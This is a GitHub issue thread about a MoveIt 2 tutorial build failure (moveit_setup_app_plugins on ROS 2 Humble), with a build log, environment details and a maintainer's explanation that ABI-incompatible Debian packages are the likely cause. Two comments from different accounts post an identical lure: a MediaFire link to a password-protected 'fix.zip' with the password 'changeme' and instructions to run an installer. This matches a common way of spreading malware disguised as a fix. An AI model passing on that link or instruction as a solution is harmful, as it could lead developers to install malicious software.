moveit/moveit2_tutorials #952: Build error for moveit_setup_app_plugin

jay4upeople, 2024-08-26:
### Description

I'm getting a build error while following the steps here - https://moveit.picknik.ai/humble/doc/tutorials/getting_started/getting_started.html.

```
ubuntu@ubuntu:~/ws_moveit2$ colcon build --mixin release
Starting >>> moveit_resources_panda_description
Starting >>> moveit_common
Starting >>> moveit_resources_pr2_description
Starting >>> srdfdom
Finished <<< moveit_common [0.81s]                                                                                                                                                         
Starting >>> moveit_resources_fanuc_description
Finished <<< moveit_resources_panda_description [0.85s]
Starting >>> moveit_resources_panda_moveit_config
Finished <<< moveit_resources_pr2_description [0.95s]                                                                                                                 
Starting >>> launch_param_builder
Finished <<< moveit_resources_fanuc_description [1.39s]                                                                                                                     
Starting >>> moveit_resources_fanuc_moveit_config
Finished <<< moveit_resources_panda_moveit_config [1.48s]                                                                                          
Starting >>> moveit_resources_prbt_support
Finished <<< srdfdom [2.72s]                                                                                                                                                                
Starting >>> moveit_core
Finished <<< launch_param_builder [2.09s]                                                                                                                                                 
Starting >>> moveit_configs_utils
Finished <<< moveit_resources_prbt_support [0.79s]                                                                                                                    
Starting >>> moveit_task_constructor_msgs
Finished <<< moveit_resources_fanuc_moveit_config [1.40s]                                                                                                                                  
Starting >>> rviz_marker_tools
Finished <<< rviz_marker_tools [2.01s]                                                                                                                                               
Starting >>> rosparam_shortcuts                                                                                                                 
Finished <<< rosparam_shortcuts [2.17s]                                                                                                                                                 
Starting >>> moveit_resources
Finished <<< moveit_configs_utils [5.02s]                                                                                                                                   
Finished <<< moveit_resources [1.03s]                                                                                                                 
Finished <<< moveit_core [7.00s]                                                                                  
Starting >>> moveit_ros_occupancy_map_monitor                            
Starting >>> moveit_simple_controller_manager
Starting >>> moveit_resources_prbt_ikfast_manipulator_plugin
Finished <<< moveit_simple_controller_manager [1.30s]                                                                                                                                    
Starting >>> pilz_industrial_motion_planner_testutils
Finished <<< moveit_resources_prbt_ikfast_manipulator_plugin [1.41s]                                                                    
Starting >>> moveit_plugins
Finished <<< moveit_ros_occupancy_map_monitor [1.79s]                                                                                   
Starting >>> moveit_ros_planning
Finished <<< moveit_plugins [1.18s]                                                                                                                                              
Starting >>> chomp_motion_planner                                                                                                                                                  
Finished <<< pilz_industrial_motion_planner_testutils [1.57s]                                                                                                                          
Starting >>> moveit_ros_control_interface
Finished <<< chomp_motion_planner [1.77s]                                                                                                                              
Starting >>> moveit_chomp_optimizer_adapter
Finished <<< moveit_ros_control_interface [2.07s]                                                                                                                            
Starting >>> moveit_planners_chomp
Finished <<< moveit_task_constructor_msgs [11.7s]                                                                                                                              
Finished <<< moveit_chomp_optimizer_adapter [0.84s]                                                                                                           
Finished <<< moveit_ros_planning [3.64s]                                                                      
Starting >>> moveit_kinematics
Starting >>> moveit_ros_warehouse                                                                       
Starting >>> moveit_planners_ompl
Finished <<< moveit_planners_chomp [2.05s]                                                                                                                                                 
Starting >>> moveit_ros_robot_interaction
Finished <<< moveit_kinematics [2.03s]                                                                                                                         
Starting >>> moveit_ros_move_group                                                                                                                                   
Finished <<< moveit_ros_warehouse [2.96s]                                                                                                                              
Starting >>> moveit_ros_benchmarks                                                                                                                                
Finished <<< moveit_planners_ompl [3.09s]                                                                                                                             
Starting >>> moveit_ros_perception
Finished <<< moveit_ros_robot_interaction [2.16s]                                                                                                                                         
Starting >>> moveit_visual_tools
Finished <<< moveit_ros_move_group [2.61s]                                                                                                                                                
Starting >>> moveit_ros_planning_interface                                                                                                                   
[... 51 lines cut ...]

Summary: 46 packages finished [33.9s]
  1 package failed: moveit_setup_app_plugins
  3 packages aborted: moveit_setup_controllers moveit_setup_srdf_plugins moveit_task_constructor_capabilities
  2 packages had stderr output: moveit_setup_app_plugins moveit_setup_controllers
  5 packages not processed

```

### Your environment
* ROS Distro: Humble
* OS Version: Ubuntu 22.04
I had installed ROS2 Humble by following the steps here - https://docs.ros.org/en/humble/Installation/Ubuntu-Install-Debs.html

```
ubuntu@ubuntu:~/ws_moveit2$ printenv | grep -i ros
ROS_VERSION=2
ROS_PYTHON_VERSION=3
AMENT_PREFIX_PATH=/opt/ros/humble
PYTHONPATH=/opt/ros/humble/lib/python3.10/site-packages:/opt/ros/humble/local/lib/python3.10/dist-packages
LD_LIBRARY_PATH=/opt/ros/humble/opt/rviz_ogre_vendor/lib:/opt/ros/humble/lib/x86_64-linux-gnu:/opt/ros/humble/lib
ROS_LOCALHOST_ONLY=0
PATH=/opt/ros/humble/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin:/snap/bin
ROS_DISTRO=humble
```

qlqw233, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

seeronline, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

mikeferguson, 2024-12-18:
This is most likely due to ABI-incompatable Debians (our Humble release was very old). A new release was recently sync'd - please give it a try.

closed 2024-12-18 by mikeferguson